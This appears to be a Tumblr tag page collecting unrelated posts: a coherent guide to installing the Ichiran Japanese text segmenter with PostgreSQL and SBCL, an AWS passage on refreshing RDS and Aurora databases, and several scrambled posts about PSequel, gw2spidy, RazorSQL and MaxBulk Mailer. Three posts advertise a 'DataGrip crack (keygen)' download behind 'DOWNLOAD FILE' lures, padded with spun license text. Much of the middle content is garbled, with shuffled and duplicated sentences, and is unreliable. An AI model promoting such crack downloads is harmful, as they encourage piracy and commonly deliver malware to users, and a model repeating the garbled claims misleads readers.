#my postgresql export works!!!
Explore tagged Tumblr posts
technicontrastron · 7 months ago
Text
Looking at data 👍
gslin · 9 months ago
Text
readevalprint · 4 years ago
Text
Ichiran@home 2021: the ultimate guide
Recently I’ve been contacted by several people who wanted to use my Japanese text segmenter Ichiran in their own projects. This is not surprising since it’s vastly superior to Mecab and similar software, and is occasionally updated with new vocabulary, unlike many other segmenters. Ichiran powers ichi.moe which is a very cool webapp that helped literally dozens of people learn Japanese.
A big obstacle towards the adoption of Ichiran is the fact that it’s written in Common Lisp and people who want to use it are often unfamiliar with this language. To fix this issue, I’m now providing a way to build Ichiran as a command line utility, which could then be called as a subprocess by scripts in other languages.
This is a master post on how to get Ichiran installed and how to use it, for people who don’t know any Common Lisp at all. I’m providing instructions for Linux (Ubuntu) and Windows; I haven’t tested whether it works on other operating systems, but it probably should.
PostgreSQL
Ichiran uses a PostgreSQL database as a source for its vocabulary and other things. On Linux install postgresql using your preferred package manager. On Windows use the official installer. You should remember the password for the postgres user, or create a new user if you know how to do it.
Download the latest release of the Ichiran database. On the release page there are commands needed to restore the dump. On Windows they don't really work; instead, try to create the database and restore the dump using pgAdmin (which is usually installed together with Postgres). Right-click on PostgreSQL/Databases/postgres and select "Query tool...". Paste the following into the Query editor and hit the Execute button.
CREATE DATABASE [database_name] WITH TEMPLATE = template0 OWNER = postgres ENCODING = 'UTF8' LC_COLLATE = 'Japanese_Japan.932' LC_CTYPE = 'Japanese_Japan.932' TABLESPACE = pg_default CONNECTION LIMIT = -1;
Then refresh the Databases folder and you should see your new database. Right-click on it then select "Restore", then choose the file that you downloaded (it wants ".backup" extension by default so choose "Format: All files" if you can't find the file).
You might get a bunch of errors when restoring the dump saying that "user ichiran doesn't exist". Just ignore them.
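For reference, on Linux the restore usually boils down to something like the following sketch (the exact commands are listed on the release page; the database name and dump file path here are just placeholders):
createdb -U postgres -E 'UTF8' -T template0 [database_name]
pg_restore -U postgres -d [database_name] /path/to/ichiran-db-dump
As noted above, "user ichiran doesn't exist" errors during the restore can be ignored.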
SBCL
Ichiran uses SBCL to run its Common Lisp code. You can download Windows binaries for SBCL 2.0.0 from the official site, and on Linux you can use the package manager, or use binaries from the official site, although they might be incompatible with your operating system.
However, you really want the latest version, 2.1.0, especially on Windows, for uh... reasons (see the note about non-ASCII command line arguments at the end of this post). There's a workaround for Windows 10 though, so if you don't mind turning on that option, you can stick with SBCL 2.0.0.
After installing some version of SBCL (SBCL requires SBCL to compile itself), download the source code of the latest version and let's get to business.
On Linux it should be easy, just run
sh make.sh --fancy
sudo sh install.sh
in the source directory.
On Windows it's somewhat harder. Install MSYS2, then run "MSYS2 MinGW 64-bit".
pacman -S mingw-w64-x86_64-toolchain make
# for paths in MSYS2 replace drive prefix C:/ by /c/ and so on
cd [path_to_sbcl_source]
export PATH="$PATH:[directory_where_sbcl.exe_is_currently]"
# check that you can run sbcl from command line now
# type (sb-ext:quit) to quit sbcl
sh make.sh --fancy
unset SBCL_HOME
INSTALL_ROOT=/c/sbcl sh install.sh
Then edit Windows environment variables so that PATH contains c:\sbcl\bin and SBCL_HOME is c:\sbcl\lib\sbcl (replace c:\sbcl here and in INSTALL_ROOT with another directory if applicable). Check that you can run a normal Windows shell (cmd) and run sbcl from it.
Quicklisp
Quicklisp is a library manager for Common Lisp. You'll need it to install the dependencies of Ichiran. Download quicklisp.lisp from the official site and run the following command:
sbcl --load /path/to/quicklisp.lisp
In the SBCL shell, execute the following commands:
(quicklisp-quickstart:install)
(ql:add-to-init-file)
(sb-ext:quit)
This will ensure quicklisp is loaded every time SBCL starts.
Ichiran
Find the directory ~/quicklisp/local-projects (%USERPROFILE%\quicklisp\local-projects on Windows) and git clone the Ichiran source code into it. It is possible to place it into an arbitrary directory, but that requires configuring ASDF, while ~/quicklisp/local-projects/ should work out of the box, as should ~/common-lisp/, but I'm not sure about the Windows equivalent of that one.
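For example (the bracketed URL is a placeholder for the actual Ichiran repository):
cd ~/quicklisp/local-projects
git clone [ichiran_repository_url]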
Ichiran won't load without a settings.lisp file, which you might notice is absent from the repository. Instead, there's a settings.lisp.template file. Copy settings.lisp.template to settings.lisp and edit the following values in settings.lisp:
*connection* this is the main database connection. It is a list of at least 4 elements: database name, database user (usually "postgres"), database password and database host ("localhost"). It can be followed by options like :port 5434 if the database is running on a non-standard port.
*connections* is an optional parameter, if you want to switch between several databases. You can probably ignore it.
*jmdict-data* this should be a path to the data files from the JMdict project. They contain descriptions of parts of speech etc.
Ignore all the other parameters; they're only needed for creating the database from scratch.
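To sum up, the configuration usually amounts to something like the following sketch (values are placeholders; the exact variable definitions can be copied from settings.lisp.template):
cp settings.lisp.template settings.lisp
# then edit settings.lisp so that:
#  *connection* lists your database name, user, password and host,
#  e.g. ("ichiran_db" "postgres" "your_password" "localhost")
#  *jmdict-data* points to the JMdict data files mentioned above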
Run sbcl. You should now be able to load Ichiran with
(ql:quickload :ichiran)
On the first run, run the following command. It should also be run after downloading a new database dump and updating Ichiran code, as it fixes various issues with the original JMdict data.
(ichiran/mnt:add-errata)
Run the test suite with
(ichiran/test:run-all-tests)
If not all tests pass, you did something wrong! If none of the tests pass, check that you configured the database connection correctly. If all tests pass, you have a working installation of Ichiran. Congratulations!
Some commands that can be used in Ichiran:
(ichiran:romanize "一覧は最高だぞ" :with-info t) this is basically a text-only equivalent of ichi.moe, everyone's favorite webapp based on Ichiran.
(ichiran/dict:simple-segment "一覧は最高だぞ") returns a list of WORD-INFO objects which contain a lot of interesting data which is available through "accessor functions". For example (mapcar 'ichiran/dict:word-info-text (ichiran/dict:simple-segment "一覧は最高だぞ")) will return a list of separate words in a sentence.
(ichiran/dict:dict-segment "一覧は最高だぞ" :limit 5) like simple-segment but returns top 5 segmentations.
(ichiran/dict:word-info-from-text "一覧") gets a WORD-INFO object for a specific word.
ichiran/dict:word-info-str converts a WORD-INFO object to a human-readable string.
ichiran/dict:word-info-gloss-json converts a WORD-INFO object into a "json" "object" containing dictionary information about a word, which is not really JSON but an equivalent Lisp representation of it. But it can be converted into a real JSON string with the jsown:to-json function. Putting it all together, the following code will convert the word 一覧 into a JSON string:
(jsown:to-json (ichiran/dict:word-info-gloss-json (ichiran/dict:word-info-from-text "一覧")))
Now, if you're not familiar with Common Lisp all this stuff might seem confusing. Which is where ichiran-cli comes in, a brand new Command Line Interface to Ichiran.
ichiran-cli
ichiran-cli is just a simple command-line application that can be called by scripts just like mecab and its ilk. The main difference is that it must be built by the user, who has already done the previous steps of the Ichiran installation process. It needs access to the postgres database, and the connection settings from settings.lisp are currently "baked in" during the build. It also contains a cache of some database references, so modifying the database (i.e. updating to a newer database dump) without also rebuilding ichiran-cli is highly inadvisable.
The build process is very easy. Just run sbcl and execute the following commands:
(ql:quickload :ichiran/cli)
(ichiran/cli:build)
sbcl should exit at this point, and you'll have a new ichiran-cli (ichiran-cli.exe on Windows) executable in the Ichiran source directory. If sbcl didn't exit, try deleting the old ichiran-cli and doing it again; it seems that on Linux sbcl sometimes can't overwrite this file for some reason.
Use the -h option to show how to use this tool. There will be more options in the future, but at the time of this post, it prints out the following:
>ichiran-cli -h
Command line interface for Ichiran
Usage: ichiran-cli [-h|--help] [-e|--eval] [-i|--with-info] [-f|--full] [input]
Available options:
  -h, --help       print this help text
  -e, --eval       evaluate arbitrary expression and print the result
  -i, --with-info  print dictionary info
  -f, --full       full split info (as JSON)
By default calls ichiran:romanize, other options change this behavior
Here are some examples of these switches:
ichiran-cli "一覧は最高だぞ" - just prints out the romanization
ichiran-cli -i "一覧は最高だぞ" - equivalent of ichiran:romanize :with-info t above
ichiran-cli -f "一覧は最高だぞ" - outputs the full result of segmentation as JSON. This is the one you'll probably want to use in scripts etc.
ichiran-cli -e "(+ 1 2 3)" - execute arbitrary Common Lisp code... yup that's right. Since this is a new feature, I don't know yet which commands people really want, so this option can be used to execute any command such as those listed in the previous section.
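Since -f outputs JSON, a script can simply capture it and feed it to any JSON parser; here is a minimal sketch (jq is just an example tool, not a requirement):
ichiran-cli -f "一覧は最高だぞ" > result.json
jq . result.json   # pretty-print the full segmentation data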
By the way, as I mentioned before, on Windows SBCL prior to 2.1.0 doesn't parse non-ascii command line arguments correctly. Which is why I had to include a section about building a newer version of SBCL. However if you use Windows 10, there's a workaround that avoids having to build SBCL 2.1.0. Open "Language Settings", find a link to "Administrative language settings", click on "Change system locale...", and turn on "Beta: Use Unicode UTF-8 for worldwide language support". Then reboot your computer. Voila, everything will work now. At least in regards to SBCL. I can't guarantee that other command line apps which use locales will work after that.
That's it for now, hope you enjoy playing around with Ichiran in this new year. よろしくおねがいします!
architecturepolh · 3 years ago
Text
Psequel alternative
We respond almost instantly to bug reports and feature requests. Perhaps the best thing about being a TablePlus user is having access to really quick support. It has everything you need in a PostgreSQL GUI tool. TablePlus is a modern, native tool with an elegant UI that allows you to simultaneously manage multiple databases such as MySQL, PostgreSQL, SQLite, Microsoft SQL Server and more. Then TablePlus is the app that you're looking for.
#Psequel alternative how to
You don’t need to be a tool expert to figure out how to use it.
#Psequel alternative for mac
Sequel : Postgresql Gui Tool For Mac Download
It has a well-thought-out design which works as you expect. You can connect, create, update, delete, import, and export your database and its data in a very fast and secure way. It's an app that can get up and running in less than half a second, or deal with heavy operations on a couple of million rows without freezing. It was built native to deliver the highest performance. You will probably need a PostgreSQL client that. Moving on to an alternative GUI tool for PostgreSQL: it's time to try something new and keep up with the latest changes.
#Psequel alternative update
In this fast-changing world where everything can be outdated easily, an app without speedy development and a frequent update schedule will never be able to deliver the best experience. For most people, PSequel is no longer an available GUI for PostgreSQL. It's also closed source, and the developer had stated there were no plans to open source it before disappearing. Although no official statement has been issued, the development of PSequel had stopped and it has been filled with tons of unanswered questions, bug reports, and feature requests. That's just great! Until PSequel died
The latest version of PSequel, which is V1.5.3, was released on. It gets SSH tunneling right while most of the others failed to do so. You can do anything with your PostgreSQL database: creating, connecting, updating, deleting, you name it. The UI is simple and elegant, just somewhat similar to Sequel Pro. It was written from scratch in Swift 2, thus it's really neat and clean.
#Psequel alternative pro
The main goal was just to bring the same experience of working with Sequel Pro from MySQL to PostgreSQL when Sequel Pro's support for PostgreSQL never seems to happen. And PSequel did a great job being a GUI client for Postgres. Inspired by the simplicity and elegance of Sequel Pro, the developer behind PSequel wanted to build a PostgreSQL equivalent of it. PSequel was a great PostgreSQL GUI client. How do I support the development of PSequel? If you like PSequel, please report bugs and/or. If you don't have a GitHub account, you could report bugs. Please include your macOS, PostgreSQL and PSequel versions when reporting a bug. If you are reporting multiple bugs or suggesting multiple features, please create separate issues for each bug/feature. How do I report bugs or suggest new features? Please try not to create duplicate issues. If you think a feature is important, please let me know and I'll adjust its priority based on its popularity. My plan is to implement most features in Sequel Pro. What's the current status of PSequel? PSequel is still in its early stage. Why macOS 10.10+ only? I am developing PSequel in my spare time. By supporting macOS 10.10+ only, I can keep the codebase simpler and save time by not testing it in older versions of macOS. Is PSequel a forked version of Sequel Pro? No, PSequel is written from scratch in Swift 2, although PSequel's UI is highly inspired by Sequel Pro. Is PSequel open source? There is no plan to open source it at this moment. I just dislike Java desktop apps personally. I am a Java developer myself and I like JVM a lot. In the good old MySQL world, my favorite client is, but its support for PostgreSQL doesn't seem to be happening. However, they are either web-based, Java-based. However, I found its UI is clumsy and complicated. FAQ Why yet another PostgreSQL GUI client? Why not just pgAdmin? Well, pgAdmin is great for its feature-richness.
Sequel : Postgresql Gui Tool For Mac Download.
bonkerlon · 3 years ago
Text
Timekeeper gw2 spidy
TIMEKEEPER GW2 SPIDY CODE
If you want to run the code that spiders through the trade market then you'll need command line access, if you just want to run the frontend code (and get a database dump from me) then you can live without ) The project will work fine with both Apache or Nginx (I actually run apache on my dev machine and nginx in production), you can find example configs in the docs folder of this project. On the PHP side of things I'm using PropelORM, thanks to that you could probably switch to PostgreSQL or MSSQL easily if you have to ) Apache / Nginx / CLI I think 4.x will suffice, though I run 5.x. You'll need the following extensions installed: You'll need PHP5.3 or higher for the namespace support etc. If you make your way to the IRC channel I have a VM image on my google drive (made by Marthisdil) with everything setup and ready to roll ) PHP 5.3
TIMEKEEPER GW2 SPIDY FREE
If you want to run this on a windows machine, for development purposes, then I strongly suggest you just run a virtual machine with linux (vmware player is free and works pretty nice). I run the project on a linux server and many of the requirements might not be available on windows and I have only (a tiny bit) of (negative) experience with windows. Me (Drakie) and other people already involved for a while are happy to share our knowledge and help you, specially if you consider contributing! Linux
TIMEKEEPER GW2 SPIDY INSTALL
There's also a INSTALL file which contains a snippet I copy paste when I setup my VM, it should suffice -) A LOT has changed and most likely will continue a while longer I'll provide you with some short setup instructions to make your life easier if you want to run the code for yourself or contribute. To continue the setup, go to "Crawling the Tradingpost". Note that this does only some of the crawling required to populate the database. When it's finished, visit localhost:8080 in a browser and you're ready to go. This will fetch the base virtual machine for developing (a Ubuntu Precise 64bit server), install all of the required packages, configure mysql and nginx, then forward the virtual machine's port 80 to your machine's port 8080. Once you have this, simply cd into the gw2spidy directory and run vagrant up. For this to work you will need three things: Virtualbox, Ruby, and the Vagrant gem. This method will provide you with a local virtual machine with a running instance of gw2spidy in a single command. The easiest way of getting started is by using Vagrant. Please join the Google Groups Mailing List for gw2spidy so that I can keep you up-to-date of any (major) changes / new versions of the Codebase! Environment setup Īll data is stored in the server's timezone, however I've made sure that data going out (charts and API) are converted to UTC (and Highcharts converts it to the browsers timezone). If you need help or have any feedback, you can contact me on or join me on #gw2spidy Drakie Date/time dataĪs usual I didn't really think about timezones when I started this project, but now that multiple people forked the project and that I'm exporting data to some people it suddenly matters. If you want a dump of the database, since that's a lot easier to work with, then just contact me ) Feedback / Help If you need any help with setup of the project or using git(hub) then just contact me and I'll be glad to help you! Now what I've built are some tools which will run constantly to automatically login to that website and record all data we can find, as a result I can record the sale listings for all the items about every hour and with that data I can create graphs with the price changing over time! ContributingĮveryone is very much welcome to contribute, 99% chance you're reading this on github so it shouldn't be too hard to fork and do pull requests right :) ? You can also access this website with a browser and use your game account to login and view all the items and listings. How does it work?ĪrenaNet has built the Trade Market so that it's loaded into the game from a website. This project aims to provide you with graphs of the sale and buy listings of items on the Guild Wars 2 Trade Market.
trustclips · 3 years ago
Text
Maxbulk mailer doesnt work
You also have support for international characters, a straightforward account manager with support for all type of authentication schemes including SSL, a complete and versatile list manager, support for importation from a wide range of sources including from remote mySQL and postgreSQL databases. Thanks to its advanced mail-merge and conditional functions you can send highly customized messages and get the best results of your campaigns. With MaxBulk Mailer you will create, manage and send your own powerful, personalized marketing message to your customers and potential customers. MaxBulk Mailer handles plain text, HTML and rich text documents and gives full support for attachments. MaxBulk Mailer is fast, fully customizable and very easy to use. MaxBulk Mailer is a full-featured and easy-to-use bulk mailer and mail-merge software for macOS and Windows that allows you to send out customized press releases, prices lists, newsletters and any kind of text or HTML documents to your customers or contacts. Why do I get a Delivery Report message after each delivery?
#MAXBULK MAILER DOESNT WORK ACTIVATION KEY#
How I can change the old activation key with the new one? How do I enter turboSMTP settings into MaxBulk Mailer Is Maxprog software prepared for macOS 12 Monterey? Is Maxprog software prepared for Windows 11? Is Maxprog software ready for the Apple ARM processor? MaxBulk Mailer works for both PC's and Macs. As a result, if the code doesnt work as expected, it is because of the code itself. I don't know about you, but I'm much more likely to give an e-mail a view if it looks like it was sent. How to use an alternative text when a tag value is empty MaxBulk Mailer sends your code as is, there is no modifications at all. What are the Zoho mail settings for MaxBulk Mailer? UPDATED How to export several lists into to a single file UPDATED How do I set up an unsubscribe link UPDATED How to add social networks icons to my message UPDATED Google ending support for less secure apps NEW Recent questions from our MaxBulk Mailer users
marketlong · 3 years ago
Text
Configure razorsql to connect to dynamo db
Export Tool – Export data in various formats.
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB CODE
A robust programming editor that embeds the powerful EditRocket code editor that supports 20 programming languages including SQL, PL/SQL, TransactSQL, SQL PL, HTML, XML, and more.
Visual Tools for creating, editing, dropping, and executing stored procedures, functions, and triggers.
Visual tools for creating, editing, dropping, describing, altering, and viewing tables, views, indexes, and sequences.
An SQL Editor for creating SQL queries.
A Database Navigator for browsing database objects.
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB PRO
You also may like to download HTTP Debugger Pro 8.17.īelow are some amazing features you can experience after installation of RazorSQL 8.0.4 freeload please keep in mind features may vary and totally depends if your system support them. RazorSQL is a SQL database query tool, SQL editor, database browser, and administration tool with support for all major databases and built in connection capabilities for DB2, Derby, Firebird, FrontBase, HSQLDB, Informix, Microsoft SQL Server, MySQL, OpenBase, Oracle, PostgreSQL, SQL Anywhere, SQLite, and Sybase. With RazorSQL you have the possibility to connect to any database you want, include multi-tabular display of queries and import data from various formats such as delimited files, Excel spreadsheets and fixed-width files.
CONFIGURE RAZORSQL TO CONNECT TO DYNAMO DB FULL
It is full offline installer standalone setup of RazorSQL 8.0.4 freeload for supported version of windows. The program and all files are checked and installed manually before uploading, program is working perfectly fine without any problem.
does not work. RazorSQL 8.0.4 free download, latest version for Windows. I tried these out and found they weren’t what I needed. Other DynamoDB GUI tools that don’t work for me: I want Command/Ctrl + S to save the updates to the document to the DB instead of having the browser prompt me to save the page to my hard drive.
I tried these out and found they weren’t what I needed. /layouts/BlogPost.astro Other DynamoDB GUI tools that don’t work for me: I want Command/Ctrl + S saved the updates to the document to the DB instead of having the browser prompt me to save the page to my hard drive. This lives in its own branch at while I figure out if it could be merged back into the main project. html, body, main Where do I get this code? In this case, main is the parent of nav, so main and its parents get their min-height set. For position:sticky to work the way I want it to, I always have to make sure all parent elements of the sticky elements have a min-height of 100vh. Sticky positioning on the Save & Edit buttons
Make the save & delete buttons used fixed positioning so that they are always available at the top of the screen, even after I’ve scrolled down the page.
Made the CodeMirror editor expand to always show 100% of the document so that my browse’s native search feature can always search the whole document instead just the content on screen.
I set up JSON validation which will notify me about invalid JSON in the editor’s gutter.
CodeMirror is used by CodePen which I’m more familiar with, so I switched to that. I tried configuring the built-in with Ace editor, but couldn’t get it to behave the way I wanted. Replacing the Ace text editor with CodeMirror
JSON validation of documents in DynamoDB.
It’s the best I’ve found yet, because:
Also, it’s open source, which means… But I can make it better
After using it for a few weeks, I wanted to improve a few things: I found a browser-based GUI to work with my local DynamoDB instance during development: dynamodb-admin by Aaron Shafovaloff.
datagrip-crack-5m · 3 years ago
Text
Download DataGrip crack (keygen) latest version T4O?
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license Any exercise of rights under this license by you or your sub-licensees is subject to the following conditions: 1. Redistributions of this software, with or without modification, must reproduce the above copyright notice and the above license statement as well as this list of conditions, in the software, the user documentation and any other. All recent versions of JetBrains desktop software allow using JetBrains Account credentials as a way of providing licensing information. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. DataGrip is covered by a perpetual fallback license, which allows you to use a specific version of software without an active subscription for it. The license also includes all bugfix updates, more specifically in X. Z version all Z releases are included. When purchasing an annual subscription, you will immediately get a perpetual fallback. Includes 17 tools. Updated subscription pricing starting October 1, JetBrains DataGrip Tag: jetbrains-license github Details for datagrip License. Proprietary; Last updated. Show more. Enable snaps on Ubuntu and install datagrip. Snaps are applications packaged with all their dependencies to run on all popular Linux distributions from a single build. They update automatically and roll back gracefully. License : Unknown. Installation scoop install DataGrip -portable. See our GitHub page and the Scoop website for more info. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.. Datagrip license. Follow edited Apr 27, at Anton Dozortsev Anton Dozortsev. Purchasing a new DataGrip license also entitles you to use previous versions of the same software. DataGrip Subscriptions are backwards compatible and can be used with any previous versions that are still available for download. Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or. DataGrip is a multi-engine database environment. This plugin will bring first-class support for any VCS you need. Any exercise of rights under this license by you or your sub-licensees is subject to the following conditions: 1. Datagrip Jetbrains License Server. Search and navigation tips. When you work with a software tool, you often need to find something or other. In DataGrip, you could be looking for things like: — Database objects: tables, views, procedures, columns and so on. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. A new DataGrip Search: Goland License Server. Free Educational Licenses for JetBrains' tools. Free License Programs. Free Educational Licenses. Learn or teach coding with best-in-class development tools from JetBrains! DataGrip Total downloads: 4 1 last week Latest version: 1. Report incorrect info. 
JetBrains DataGrip 1. We cannot confirm if there is a free download of this software available. Universities, colleges, schools, and non-commercial educational organizations are eligible for free licensing to install all JetBrains tools in classrooms and computer labs for educational purposes. What is Datagrip tutorial. The action time can be either before or after a row is modified.
datagrip-crack-ma · 3 years ago
Text
Download DataGrip crack (keygen) latest version G4CH#
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license DataGrip is a tool in the Database Tools category of a tech stack. Explore DataGrip's Story. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. If you want to get a DataGrip license for free or at a discount, check out the offers on the following page: Toolbox Subscription - Special Offers. If you have any questions, contact our sales support. Free individual licenses are available for students, faculty members, and core contributors to open source projects. Useful links. DataGrip Buy with confidence from the JetBrains licensing experts. The serial number for DataGrip is available. This release was created for you, eager to use DataGrip Xtra full and without limitations. Our intentions are not to harm DataGrip software company but to give the possibility to those who can not pay for any piece of software out there. This should be your intention too, as a user, to fully evaluate. Visual Query Builder. Data Report Wizard. Database Designer. Query Builder. With the help of this intelligent MySQL client the work with data and code has. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. This plugin will bring first-class support for any VCS you need. Are managed by faculty members, professors, IT support staff, and other official representatives of your educational organization. License administrators manage the licenses in their JetBrains Account. Are valid for one year and can be renewed in the 30 days before the license expiration date. Must be used only for teaching classes. Software Licenses Allows you to execute queries in different modes and provides local history that keeps track of all your activity and protects you from losing your work. Lets you jump to any table, view, or procedure by its name via corresponding action, or. JetBrains DataGrip Todo o mundo. Download JetBrains DataGrip The license also includes all bugfix updates, more specifically in X. Select this option if you want non-trusted certificates that is the certificates that are not added to the list. What is Jetbrains License Server Github. Likes: Shares: You can also use gists to save and share console output when running, debugging, or testing your code. A new DataGrip Search: Goland License Server. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. Details for datagrip License. Proprietary; Last updated. Show more. Enable snaps on Ubuntu and install datagrip. Snaps are applications packaged with all their dependencies to run on all popular Linux distributions from a single build. They update automatically and roll back gracefully. Each Db2 database product and offering has a license certificate file associated with it. The license certificate file should be registered before using the Db2 database product or offering. To verify license compliance, run the db2licm command and generate a compliance report. Discounted and complimentary licenses. 
FREE for students and teachers. FREE for education and training. The cost of a term license depends upon its length in time and, of course, its use. Many software licenses specify a limited time period or term during which the user will be permitted to use the software. At the end of the term, you must stop using the software unless a new license is purchased or the term is extended through an agreement with. ISL Online license doesn't limit the number or workstations of clients, users, and users you can support. DataGrip DataGrip - subscription license 3rd year - 1 user. Part: C-S. Advertised Price. Add to Cart. DataGrip includes an evaluation license key for a free day trial. Do Leetcode exercises in IDE, support leetcode. License : Unknown. Installation scoop install DataGrip -portable. See our GitHub page and the Scoop website for more info. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.. If you have settings you want to keep, like fonts, colours, inspections, etc, you wan to keep. Using other programs like HeidiSQL im able to connect but when i try to connect using datagrip i get the following error: [] The connection attempt failed. SocketException: Connection reset. All Right Reserved Anyone with information is asked to contact us at Tag: jetbrains-license github
datagrip-crack-mu · 3 years ago
Text
Download DataGrip crack (serial key) latest version 8E9?
💾 ►►► DOWNLOAD FILE 🔥🔥🔥 Datagrip license Compare DataGrip vs. PyCharm vs. Visual Studio Code using this comparison chart. Compare price, features, and reviews of the software side-by-side to. Datagrip license. Follow edited Apr 27, at Anton Dozortsev Anton Dozortsev. Exporting a PostgreSQL database. Access the command line on the computer where the database is stored. Using other programs like HeidiSQL im able to connect but when i try to connect using datagrip i get the following error: [] The connection attempt failed. SocketException: Connection reset. I am using datagrip as the main demonstration of the problem, because it provides some debug information when testing the connection, but I have tried on dbeaver and tableplus, both failed to connect. Other users in my organization are able to connect to the remote mysql server just fine on macos machines. Logs from datagrip:. Are valid for one year and can be renewed in the 30 days before the license expiration date. Must be used only for teaching classes. Gif Recorder 3. DataGrip First I tried to use localhost as my host, but it uses, of course, Windows psql service instead of ubuntu's.. DataGrip is a tool in the Database Tools category of a tech stack. Explore DataGrip's Story. Software Licenses Allows you to execute queries in different modes and provides local history that keeps track of all your activity and protects you from losing your work. Lets you jump to any table, view, or procedure by its name via corresponding action, or. If you are keeping the software and want to use it longer than its trial time, we strongly encourage you purchasing the license key from DataGrip official website. Our releases are to prove that we can! Nothing can stop us, we keep fighting for freedom despite all the difficulties we face each day. On-the-fly analysis and quick-fixes: DataGrip detects probable bugs in your code and suggests the best options to fix them on the fly. It will immediately let you know about unresolved objects, using keywords as identifiers and always offers the way to fix problems. Note: the price shown in the listing is that of a 1-year individual customer. Purchasing a new DataGrip license also entitles you to use previous versions of the same software. DataGrip Subscriptions are backwards compatible and can be used with any previous versions that are still available for download. Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or. I copied the endpoint from AWS console and I'm using the username and password I entered when creating the instance. What am I doing wrong?. This plugin will bring first-class support for any VCS you need. JetBrains DataGrip Details for datagrip License Proprietary Last updated 12 May DataGrip is a multi-engine database environment. DataGrip is a great tool for accessing a wide range of databases. You can get a free 30 day evaluation license. But perhaps you want to evaluate for a tiny bit longer? DataGrip is a great tool for. Datagrip Jetbrains License Server. Search and navigation tips. When you work with a software tool, you often need to find something or other. In DataGrip, you could be looking for things like: — Database objects: tables, views, procedures, columns and so on. If you want to get a DataGrip license for free or at a discount, check out the offers on the following page: Toolbox Subscription - Special Offers. If you have any questions, contact our sales support. 
Free individual licenses are available for students, faculty members, and core contributors to open source projects. Useful links. A new DataGrip Search: Goland License Server. It works also PhpStorm Versions released on Nov 2, and later can be activated with a JetBrains Account username and password or A - Overview. DataGrip is a database management environment for developers. It is designed to query, create, and manage databases. Databases can work locally, on a server, or in the cloud.
pathloading742 · 4 years ago
Text
Free Download Postgresql Database Design Tool Programs
Free Download Postgresql Database Design Tool Programs Free
The 13.1 version of PostgreSQL is available as a free download on our website. PostgreSQL belongs to Development Tools. The most popular versions among PostgreSQL users are 13.0, 12.4 and 12.3. The actual developer of the free software is PostgreSQL Global Development Group. The latest version of the program is supported on PCs running Windows. Top 5 Free Database Diagram Design Tools by Anthony Thong Do. A database schema is the blueprints of your database, it represents the description of a database structure, data types, and the constraints on the database. And designing database schemas is one of the very first and important steps to start developing any software/website.
Free Download Postgresql Database Design Tool Programs Pdf
It is a practical DBA's Swiss Army knife
If you dig into Oracle, Postgres, SQL Server, DB2, MySQL, and other databases regularly, this tool is for you! DbVis has an excellent table/query browser with advanced display, export, filtering capability, a powerful table editor, great transaction control, great import capabilities, and tools to navigate physical database structure. One can 'sling' data between databases of varying types with ease, even LARGE data sets, if necessary. It's not an ETL tool. It is a practical DBA's Swiss Army knife.
Michael Leo, Owner at Kettle River Consulting Inc
It will make your daily work easier
I am a product integration developer in a database company. I use DbVisualizer as a default SQL client on my daily work for performing compatibility tests between databases and testing our integration extensions. I like its user-friendly interface and rich feature set. The feature that it saves settings between the sessions is the most I like. If you interact with databases, use DbVisualizer! It will make your daily work easier.
Muhammet Orazov, Software Engineer at Exasol
It works like a charm
Since I teach and use 3 database engines, it is the perfect tool to switch among them. I use it for SQL, PL-SQL and T-SQL development. I also use it in my common DBA tasks, either through graphical interface or by SQL script. It is reliable and I trust in its results.
José Aser, Database Teacher at Lusophone University Portugal
globalmediacampaign · 4 years ago
Text
Orchestrating database refreshes for Amazon RDS and Amazon Aurora
The database refresh process consists of recreating a target database using a consistent data copy of a source database, usually done for test and development purposes. Fully managed database solutions such as Amazon Relational Database Service (Amazon RDS) or Amazon Aurora make it incredibly easy to do that. However, database administrators may need to run some post-refresh activities such as data masking or password changes, or they may need to orchestrate multiple refreshes because they manage several databases, each of them with more than one environment. In some cases, refreshes have to be performed frequently, even daily. In this post, we describe the features of a serverless solution that you can use to perform database refresh operations at scale, with a higher level of automation. This solution can be deployed and tested using the instructions available in the GitHub repo. In the next section, we go over what you're going to build.
Potential use cases
The solution described in this post enables you to do the following:
Refresh an existing database (or create a new one) using one of the four options available:
- latestpoint – The data is aligned to the latest point in time.
- torestorepoint – The data is aligned to a specified point in time.
- fromsnapshot – The data is aligned at the snapshot creation time.
- fast-cloning (only for Aurora) – The data is aligned to the latest point in time, but it's cloned using the fast-cloning feature provided by Aurora.
Refresh an existing encrypted database (or create a new one). A cross-account use case has the following considerations:
- The only options available are fromsnapshot or fast-cloning (only for Aurora).
- The AWS Key Management Service (AWS KMS) primary key (managed by the source account) must be manually shared with the target AWS account before launching the refresh.
Perform a cross-account refresh of an existing database (or create a new one). As a prerequisite, the source account has to share the Amazon RDS or Aurora snapshot, or the source Aurora cluster, with the target account before launching the refresh process.
Run post-refresh SQL scripts against the new refreshed database (only available for Amazon RDS for MariaDB, Amazon RDS for MySQL, and Aurora MySQL) to perform the following:
- Clearing, masking, or modifying sensitive data coming from the source production database.
- Deleting unnecessary data or removing unnecessary objects coming from the source production database.
Customize the solution by adding or removing steps to orchestrate operations for those applications that have different requirements, using the same state machine.
